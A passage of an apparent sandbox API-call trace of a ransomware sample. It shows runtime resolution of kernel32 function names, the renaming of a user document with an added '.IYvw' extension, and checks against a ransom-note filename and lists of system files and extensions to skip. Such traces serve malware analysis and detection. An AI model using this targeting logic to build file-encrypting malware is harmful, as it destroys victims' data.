lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.754] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.754] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.754] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.754] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.754] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.754] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.754] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.754] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.754] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.754] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.754] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.754] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.754] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.754] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.754] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.754] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.754] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.754] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.754] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.755] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.755] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.755] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.755] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.755] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.755] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.755] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.755] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.755] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.755] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.755] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.755] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.755] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.755] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.755] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.755] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.755] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.755] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.756] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.756] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.756] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.756] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.756] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.756] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.756] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.756] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.756] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.756] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.756] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.756] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.756] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.756] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.756] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.756] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.756] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.756] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.757] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.757] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.757] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.757] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.757] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.757] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.757] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.757] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.757] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.757] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.757] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.757] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.757] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.757] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.757] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.757] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.757] lstrlenA (lpString="DELETEATOM") returned 10 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.757] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.757] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.758] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.758] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.758] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.758] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.758] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.758] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.758] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.758] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.758] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.758] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.758] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.758] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.758] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.758] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.758] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.758] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.758] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.758] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.759] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.759] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.759] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.759] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.759] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.759] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.759] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.759] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.759] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.759] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.759] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.759] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.759] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.759] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.759] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.759] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.759] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.759] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.759] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.760] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.760] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.760] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx") returned 57 [0083.760] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx.IYvw") returned 62 [0083.760] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zuarq_fqofl.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx.IYvw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zuarq_fqofl.xlsx.iyvw"), dwFlags=0x0) returned 1 [0083.761] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.761] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.761] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.761] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x781ccbf0, ftCreationTime.dwHighDateTime=0x1d4c630, ftLastAccessTime.dwLowDateTime=0x2b0a77a0, ftLastAccessTime.dwHighDateTime=0x1d4d3b3, ftLastWriteTime.dwLowDateTime=0x2b0a77a0, ftLastWriteTime.dwHighDateTime=0x1d4d3b3, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="94tBqj 9I.csv", cAlternateFileName="94TBQJ~1.CSV")) returned 1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="DECRYPT-FILES.txt") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="autorun.inf") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="boot.ini") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="desktop.ini") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="ntuser.dat") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="iconcache.db") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="bootsect.bak") returned -1 [0083.761] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="ntuser.dat.log") returned -1 [0083.762] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="thumbs.db") returned -1 [0083.762] lstrcmpiW (lpString1="94tBqj 9I.csv", lpString2="Bootfont.bin") returned -1 [0083.762] lstrlenW (lpString="94tBqj 9I.csv") returned 13 [0083.762] lstrcmpiW (lpString1="csv", lpString2="lnk") returned -1 [0083.762] lstrcmpiW (lpString1="csv", lpString2="exe") returned -1 [0083.762] lstrcmpiW (lpString1="csv", lpString2="sys") returned -1 [0083.762] lstrcmpiW (lpString1="csv", lpString2="dll") returned -1 [0083.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.762] lstrlenW (lpString="94tBqj 9I.csv") returned 13 [0083.762] 